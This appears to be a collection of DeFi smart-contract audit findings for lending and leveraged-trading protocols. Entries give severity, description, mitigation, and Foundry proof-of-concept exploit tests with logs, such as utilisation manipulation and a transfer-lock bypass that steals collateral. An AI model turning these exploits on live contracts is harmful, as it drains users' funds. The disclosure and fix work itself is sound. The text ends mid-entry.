test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n\\nThis is the edited version of `setUp()` in `_scenario.t.sol`\\n```\\nfunction setUp() public virtual override(Fuzz_Lending_Test) {\\n Fuzz_Lending_Test.setUp();\\n deployArcadiaLendingWithAccounts();\\n\\n vm.prank(users.creatorAddress);\\n pool.addTranche(address(tranche), 50);\\n\\n // Deposit funds in the pool.\\n deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);\\n\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 100);\\n //only 1 asset was minted to the liquidity provider\\n tranche.mint(100, users.liquidityProvider);\\n vm.stopPrank();\\n\\n vm.startPrank(users.creatorAddress);\\n pool.setAccountVersion(1, true);\\n pool.setInterestParameters(\\n Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold\\n );\\n vm.stopPrank();\\n\\n vm.prank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool));\\n }\\n```\\n\\nThis test was added to `BorrowAndRepay.scenario.t.sol`\\n```\\n function testScenario_Poc() public {\\n\\n uint poolBalance = mockERC20.stable1.balanceOf(address(pool));\\n console.log(poolBalance, "initial pool balance. This is also the amount deposited into tranche");\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 1e18);\\n mockERC20.stable1.transfer(address(pool),1e18);\\n vm.stopPrank();\\n\\n // Given: collateralValue is smaller than maxExposure.\\n //amount token up to max\\n uint112 amountToken = 1e30;\\n uint128 amountCredit = 1e10;\\n\\n //get the collateral factor\\n uint16 collFactor_ = Constants.tokenToStableCollFactor;\\n uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;\\n\\n //deposits token1 into proxyAccount\\n depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);\\n\\n uint256 maxCredit = (\\n //amount credit is capped based on amount Token\\n (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4\\n / 10 ** (18 - Constants.stableDecimals)\\n );\\n\\n\\n vm.startPrank(users.accountOwner);\\n //borrow the amountCredit to the proxy account\\n pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);\\n vm.stopPrank();\\n\\n assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);\\n\\n //warp 2 minutes into the future.\\n vm.roll(block.number + 10);\\n vm.warp(block.timestamp + 120);\\n\\n console.log("warp 2 minutes into future");\\n\\n address victim = address(123);\\n deal(address(mockERC20.stable1), victim, type(uint128).max, true);\\n\\n vm.startPrank(victim);\\n mockERC20.stable1.approve(address(pool), type(uint128).max);\\n uint shares = tranche.mint(1e3, victim);\\n vm.stopPrank();\\n\\n console.log("mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack");\\n\\n //function withdraw(uint256 assets, address receiver, address owner_)\\n\\n //WITHDRAWN 1e5\\n vm.startPrank(users.liquidityProvider);\\n uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);\\n vm.stopPrank();\\n\\n console.log(withdrawShares, "shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!");\\n\\n\\n }\\n```\\n
Add a utilisation cap of 100%. Many other lending protocols implement this mitigation.
An early depositor can steal funds from future depositors through utilisation/interest rate manipulation.
```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n
`LendingPool#flashAction` is broken when trying to refinance position across `LendingPools` due to improper access control
medium
When refinancing an account, `LendingPool#flashAction` is used to facilitate the transfer. However due to access restrictions on `updateActionTimestampByCreditor`, the call made from the new creditor will revert, blocking any account transfers. This completely breaks refinancing across lenders which is a core functionality of the protocol.\\nLendingPool.sol#L564-L579\\n```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n\\nWe see above that `account#updateActionTimestampByCreditor` is called before `flashActionByCreditor`.\\nAccountV1.sol#L671\\n```\\nfunction updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }\\n```\\n\\nWhen we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor since the `flashaction` should originate from there. This will cause the call to revert, making it impossible to refinance across `lendingPools`.
`Account#updateActionTimestampByCreditor()` should be callable by BOTH the current and pending creditor
Refinancing is impossible
```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n
Malicious keepers can manipulate the price when executing an order
high
Malicious keepers can manipulate the price when executing an order by selecting a price in favor of either the LPs or long traders, leading to a loss of assets to the victim's party.\\nWhen the keeper executes an order, it was understood from the protocol team that the protocol expects that the keeper must also update the Pyth price to the latest one available off-chain. In addition, the contest page mentioned that "an offchain price that is pulled by the keeper and pushed onchain at time of any order execution".\\nThis requirement must be enforced to ensure that the latest price is always used.\\n```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n\\nHowever, this requirement can be bypassed by malicious keepers. A keeper could skip or avoid the updating of the Pyth price by passing in an empty `priceUpdateData` array, which will pass the empty array to the `OracleModule.updatePythPrice` function.\\n```\\nFile: OracleModifiers.sol\\n /// @dev Important to use this modifier in functions which require the Pyth network price to be updated.\\n /// Otherwise, the invariant checks or any other logic which depends on the Pyth network price may not be correct.\\n modifier updatePythPrice(\\n IFlatcoinVault vault,\\n address sender,\\n bytes[] calldata priceUpdateData\\n ) {\\n IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).updatePythPrice{value: msg.value}(\\n sender,\\n priceUpdateData\\n );\\n _;\\n }\\n```\\n\\nWhen the Pyth's `Pyth.updatePriceFeeds` function is executed, the `updateData` parameter will be set to an empty array.\\n```\\nFile: OracleModule.sol\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n\\n // Update the price data (and pay the fee)\\n offchainOracle.oracleContract.updatePriceFeeds{value: fee}(priceUpdateData);\\n\\n if (msg.value - fee > 0) {\\n // Need to refund caller. Try to return unused value, or revert if failed\\n (bool success, ) = sender.call{value: msg.value - fee}("");\\n if (success == false) revert FlatcoinErrors.RefundFailed();\\n }\\n }\\n```\\n\\nInspecting the source code of Pyth's on-chain contract, the `Pyth.updatePriceFeeds` function will not perform any update since the `updateData.length` will be zero in this instance.\\n```\\nfunction updatePriceFeeds(\\n bytes[] calldata updateData\\n) public payable override {\\n uint totalNumUpdates = 0;\\n for (uint i = 0; i < updateData.length; ) {\\n if (\\n updateData[i].length > 4 &&\\n UnsafeCalldataBytesLib.toUint32(updateData[i], 0) ==\\n ACCUMULATOR_MAGIC\\n ) {\\n totalNumUpdates += updatePriceInfosFromAccumulatorUpdate(\\n updateData[i]\\n );\\n } else {\\n updatePriceBatchFromVm(updateData[i]);\\n totalNumUpdates += 1;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n uint requiredFee = getTotalFee(totalNumUpdates);\\n if (msg.value < requiredFee) revert PythErrors.InsufficientFee();\\n}\\n```\\n\\nThe keeper is permissionless, thus anyone can be a keeper and execute order on the protocol. If this requirement is not enforced, keepers who might also be LPs (or collude with LPs) can choose whether to update the Pyth price to the latest price or not, depending on whether the updated price is in favor of the LPs. For instance, if the existing on-chain price ($1000 per ETH) is higher than the latest off-chain price ($950 per ETH), malicious keepers will use the higher price of $1000 to open the trader's long position so that its position's entry price will be set to a higher price of $1000. When the latest price of $950 gets updated, the longer position will immediately incur a loss of $50. Since this is a zero-sum game, long traders' loss is LPs' gain.\\nNote that per the current design, when the open long position order is executed at $T2$, any price data with a timestamp between $T1$ and $T2$ is considered valid and can be used within the `executeOpen` function to execute an open order. Thus, when the malicious keeper uses an up-to-date price stored in Pyth's on-chain contract, it will not revert as long as its timestamp is on or after $T1$.\\n\\nAlternatively, it is also possible for the opposite scenario to happen where the keepers favor the long traders and choose to use a lower older price on-chain to execute the order instead of using the latest higher price. As such, the long trader's position will be immediately profitable after the price update. In this case, the LPs are on the losing end.\\nSidenote: The oracle's `maxDiffPercent` check will not guard against this attack effectively. For instance, in the above example, if the Chainlink price is $975 and the `maxDiffPercent` is 5%, the Pyth price of $950 or $1000 still falls within the acceptable range. If the `maxDiffPercent` is reduced to a smaller margin, it will potentially lead to a more serious issue where all the transactions get reverted when fetching the price, breaking the entire protocol.
Ensure that the keepers must update the Pyth price when executing an order. Perform additional checks against the `priceUpdateData` submitted by the keepers to ensure that it is not empty and `priceId` within the `PriceInfo` matches the price ID of the collateral (rETH), so as to prevent malicious keeper from bypassing the price update by passing in an empty array or price update data that is not mapped to the collateral (rETH).
Loss of assets as shown in the scenario above.
```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n
Losses of some long traders can eat into the margins of others
medium
The losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits, leading to a loss of assets for the long traders.\\nAt $T0$, the current price of ETH is $1000 and assume the following state:\\nAlice's Long Position 1 Bob's Long Position 2 Charles (LP)\\nPosition Size = 6 ETH\\nMargin = 3 ETH\\nLast Price (entry price) = $1000 Position Size = 6 ETH\\nMargin = 5 ETH\\nLast Price (entry price) = $1000 Deposited 12 ETH\\nThe `stableCollateralTotal` will be 12 ETH\\nThe `GlobalPositions.marginDepositedTotal` will be 8 ETH (3 + 5)\\nThe `globalPosition.sizeOpenedTotal` will be 12 ETH (6 + 6)\\nThe total balance of ETH in the vault is 20 ETH.\\nAs this is a perfectly hedged market, the accrued fee will be zero, and ignored in this report for simplicity's sake.\\nAt $T1$, the price of the ETH drops from $1000 to $600. At this point, the settle margin of both long positions will be as follows:\\nAlice's Long Position 1 Bob's Long Position 2\\npriceShift = Current Price - Last Price = $600 - $1000 = -$400\\nPnL = (Position Size * priceShift) / Current Price = (6 ETH * -$400) / $400 = -4 ETH\\nsettleMargin = marginDeposited + PnL = 3 ETH + (-4 ETH) = -1 ETH PnL = -4 ETH (Same calculation)\\nsettleMargin = marginDeposited + PnL = 5 ETH + (-4 ETH) = 1 ETH\\nAlice's long position is underwater (settleMargin < 0), so it can be liquidated. When the liquidation is triggered, it will internally call the `updateGlobalPositionData` function. Even if the liquidation does not occur, any of the following actions will also trigger the `updateGlobalPositionData` function internally:\\nexecuteOpen\\nexecuteAdjust\\nexecuteClose\\nThe purpose of the `updateGlobalPositionData` function is to update the global position data. This includes getting the total profit loss of all long traders (Alice & Bob), and updating the margin deposited total + stable collateral total accordingly.\\nAssume that the `updateGlobalPositionData` function is triggered by one of the above-mentioned functions. Line 179 below will compute the total PnL of all the opened long positions.\\n```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n\\nThe `profitLossTotal` is -8 ETH. This is aligned with what we have calculated earlier, where Alice's PnL is -4 ETH and Bob's PnL is -4 ETH (total = -8 ETH loss).\\nAt Line 184 below, the `newMarginDepositedTotal` will be set to as follows (ignoring the `_marginDelta` for simplicity's sake)\\n```\\nnewMarginDepositedTotal = _globalPositions.marginDepositedTotal + _marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 8 ETH + 0 + (-8 ETH) = 0 ETH\\n```\\n\\nWhat happened above is that 8 ETH collateral is deducted from the long traders and transferred to LP. When `newMarginDepositedTotal` is zero, this means that the long trader no longer owns any collateral. This is incorrect, as Bob's position should still contribute 1 ETH remaining margin to the long trader's pool.\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nWith the current implementation, the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.\\n```\\nbeing File: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n
The following are the two issues identified earlier and the recommended fixes:\\nIssue 1\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nFix: Alice -1 ETH loss should be borne by the LP, not the long traders. The stable collateral total of LP should be deducted by 1 ETH to bear the cost of the loss.\\nIssue 2\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nFix: Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin regardless of the PnL of other long traders. Bob's margin should be isolated from Alice's loss.
Loss of assets for the long traders as the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.
```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n
The transfer lock for leveraged position orders can be bypassed
high
The leveraged positions can be closed either through `DelayedOrder` or through the `LimitOrder`. Once the order is announced via `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` function the LeverageModule's `lock` function is called to prevent given token to be transferred. This mechanism can be bypassed and it is possible to unlock the token transfer while having order announced.\\nExploitation scenario:\\nAttacker announces leverage close order for his position via `announceLeverageClose` of `DelayedOrder` contract.\\nAttacker announces limit order via `announceLimitOrder` of `LimitOrder` contract.\\nAttacker cancels limit order via `cancelLimitOrder` of `LimitOrder` contract.\\nThe position is getting unlocked while the leverage close announcement is active.\\nAttacker sells the leveraged position to a third party.\\nAttacker executes the leverage close via `executeOrder` of `DelayedOrder` contract and gets the underlying collateral stealing the funds from the third party that the leveraged position was sold to.\\nFollowing proof of concept presents the attack:\\n```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log("alice balance", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log("alice after creating two orders", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log("new owner of position NFT", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log("alice after transfering position NFT out e.g. selling", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log("alice after executing delayerd order and cashing out profit", finalBalance);\\n console2.log("profit", finalBalance - balance);\\n}\\n```\\n\\nOutput\\n```\\nRunning 1 test for test/unit/Common/LimitOrder.t.sol:LimitOrderTest\\n[PASS] testExploitTransferOut() (gas: 743262)\\nLogs:\\n alice balance 99879997000000000000000\\n alice after creating two orders 99879997000000000000000\\n new owner of position NFT 0x0000000000000000000000000000000000000001\\n alice after transfering position NFT out e.g. selling 99879997000000000000000\\n alice after executing delayerd order and cashing out profit 99889997000000000000000\\n profit 10000000000000000000\\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 50.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n
It is recommended to prevent announcing order either through `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` if the leveraged position is already locked.
The attacker can sell the leveraged position with a close order opened, execute the order afterward, and steal the underlying collateral.
```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log("alice balance", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log("alice after creating two orders", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log("new owner of position NFT", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log("alice after transfering position NFT out e.g. selling", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log("alice after executing delayerd order and cashing out profit", finalBalance);\\n console2.log("profit", finalBalance - balance);\\n}\\n```\\n
A malicious user can bypass limit order trading fees via cross-function re-entrancy
high
A malicious user can bypass limit order trading fees via cross-function re-entrancy, since `_safeMint` makes an external call to the user before updating state.\\nIn the `LeverageModule` contract, the `_mint` function calls `_safeMint`, which makes an external call `to` the receiver of the NFT (the `to` address).\\n\\nOnly after this external call, `vault.setPosition()` is called to create the new position in the vault's storage mapping. This means that an attacker can gain control of the execution while the state of `_positions[_tokenId]` in FlatcoinVault is not up-to-date.\\n\\nThis outdated state of `_positions[_tokenId]` can be exploited by an attacker once the external call has been made. They can re-enter `LimitOrder::announceLimitOrder()` and provide the tokenId that has just been minted. In that function, the trading fee is calculated as follows:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n\\nHowever since the position has not been created yet (due to state being updated after an external call), this results in the `tradeFee` being 0 since `vault.getPosition(tokenId).additionalSize` returns the default value of a uint256 (0), and `tradeFee` = fee * size.\\nHence, when the limit order is executed, the trading fee (tradeFee) charged to the user will be `0`.\\nA user announces opening a leverage position, calling announceLeverageOpen() via a smart contract which implements `IERC721Receiver`.\\nOnce the keeper executes the order, the contract is called, with the function `onERC721Received(address,address,uint256,bytes)`\\nThe function calls `LimitOrder::announceLimitOrder()` to create the desired limit order to close the position. (stop loss, take profit levels)\\nThe contract then returns `msg.sig` (the function signature of the executing function) to satify the IERC721Receiver's requirement.\\nTo run this proof of concept:\\nAdd 2 files `AttackerContract.sol` and `ReentrancyPoC.t.sol` to `flatcoin-v1/test/unit` in the project's repo.\\nrun `forge test --mt test_tradingFeeBypass -vv` in the terminal\\n\\n\\n
To fix this specific issue, the following change is sufficient:\\n```\\n// Remove the line below\\n_newTokenId = _mint(_account); \\n\\nvault.setPosition( \\n FlatcoinStructs.Position({\\n lastPrice: entryPrice,\\n marginDeposited: announcedOpen.margin,\\n additionalSize: announcedOpen.additionalSize,\\n entryCumulativeFunding: vault.cumulativeFundingRate()\\n }),\\n// Remove the line below\\n _newTokenId\\n// Add the line below\\n tokenIdNext\\n);\\n// Add the line below\\n_newTokenId = _mint(_account); \\n```\\n\\nHowever there are still more state changes that would occur after the `_mint` function (potentially yielding other cross-function re-entrancy if the other contracts were changed) so the optimum solution would be to mint the NFT after all state changes have been executed, so the safest solution would be to move `_mint` all the way to the end of `LeverageModule::executeOpen()`.\\nOtherwise, if changing this order of operations is undesirable for whatever reason, one can implement the following check within `LimitOrder::announceLimitOrder()` to ensure that the `positions[_tokenId]` is not uninitialized:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n\\n// Add the line below\\nrequire(additionalSize > 0, "Additional Size of a position cannot be zero");\\n```\\n
A malicious user can bypass the trading fees for a limit order, via cross-function re-entrancy. These trading fees were supposed to be paid to the LPs by increasing `stableCollateralTotal`, but due to limit orders being able to bypass trading fees (albeit during the same transaction as opening the position), LPs are now less incentivised to provide their liquidity to the protocol.
```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n
Incorrect handling of PnL during liquidation
high
The incorrect handling of PnL during liquidation led to an error in the protocol's accounting mechanism, which might result in various issues, such as the loss of assets and the stable collateral total being inflated.\\nFirst Example\\nAssume a long position with the following state:\\nMargin Deposited = +20\\nAccrued Funding = -100\\nProfit & Loss (PnL) = +100\\nLiquidation Margin = 30\\nLiquidation Fee = 25\\nSettled Margin = Margin Deposited + Accrued Funding + PnL = 20\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 100, while the LP's `stableCollateralTotal` will increase by 100.\\n```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n\\nSince the position's settle margin is below the liquidation margin, the position will be liquidated.\\nAt Line 109, the condition `(settledMargin > 0)` will be evaluated as `True`. At Line 123:\\n```\\nif (uint256(settledMargin) > expectedLiquidationFee)\\nif (+20 > +25) => False\\nliquidatorFee = settledMargin\\nliquidatorFee = +20\\n```\\n\\nThe `liquidationFee` will be to +20 at Line 127 below. This basically means that all the remaining margin of 20 will be given to the liquidator, and there should be no remaining margin for the LPs.\\nAt Line 133 below, the `vault.updateStableCollateralTotal` function will be executed:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n\\nstableCollateralTotal = (x + 100) - 100 = x\\n```\\n\\nWhen `vault.updateStableCollateralTotal` is set to `-100`, `stableCollateralTotal` is equal to $x$.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n // Check that the total margin deposited by the long traders is not -ve.\\n // To get this amount, we will have to account for the PnL and funding fees accrued.\\n int256 settledMargin = positionSummary.marginAfterSettlement;\\n\\n uint256 liquidatorFee;\\n\\n // If the settled margin is greater than 0, send a portion (or all) of the margin to the liquidator and LPs.\\n if (settledMargin > 0) {\\n // Calculate the liquidation fees to be sent to the caller.\\n uint256 expectedLiquidationFee = PerpMath._liquidationFee(\\n position.additionalSize,\\n liquidationFeeRatio,\\n liquidationFeeLowerBound,\\n liquidationFeeUpperBound,\\n currentPrice\\n );\\n\\n uint256 remainingMargin;\\n\\n // Calculate the remaining margin after accounting for liquidation fees.\\n // If the settled margin is less than the liquidation fee, then the liquidator fee is the settled margin.\\n if (uint256(settledMargin) > expectedLiquidationFee) {\\n liquidatorFee = expectedLiquidationFee;\\n remainingMargin = uint256(settledMargin) - expectedLiquidationFee;\\n } else {\\n liquidatorFee = uint256(settledMargin);\\n }\\n\\n // Adjust the stable collateral total to account for user's remaining margin.\\n // If the remaining margin is greater than 0, this goes to the LPs.\\n // Note that {`remainingMargin` - `profitLoss`} is the same as {`marginDeposited` + `accruedFunding`}.\\n vault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\n\\n // Send the liquidator fee to the caller of the function.\\n // If the liquidation fee is greater than the remaining margin, then send the remaining margin.\\n vault.sendCollateral(msg.sender, liquidatorFee);\\n } else {\\n // If the settled margin is -ve then the LPs have to bear the cost.\\n // Adjust the stable collateral total to account for user's profit/loss and the negative margin.\\n // Note: We are adding `settledMargin` and `profitLoss` instead of subtracting because of their sign (which will be -ve).\\n vault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\n }\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(20 + (-100))})\\nvault.updateGlobalPositionData({marginDelta: 80})\\n\\nprofitLossTotal = 100\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = (y - 100) + 80 + 100 = (y + 80)\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = x + (-100) = (x - 100)\\n```\\n\\nThe final `newMarginDepositedTotal` is $y + 80$ and `stableCollateralTotal` is $x -100$, which is incorrect. In this scenario\\nThere is no remaining margin for the LPs, as all the remaining margin has been sent to the liquidator as a fee. The remaining margin (settled margin) is also not negative. Thus, there should not be any loss on the `stableCollateralTotal`. The correct final `stableCollateralTotal` should be $x$.\\nThe final 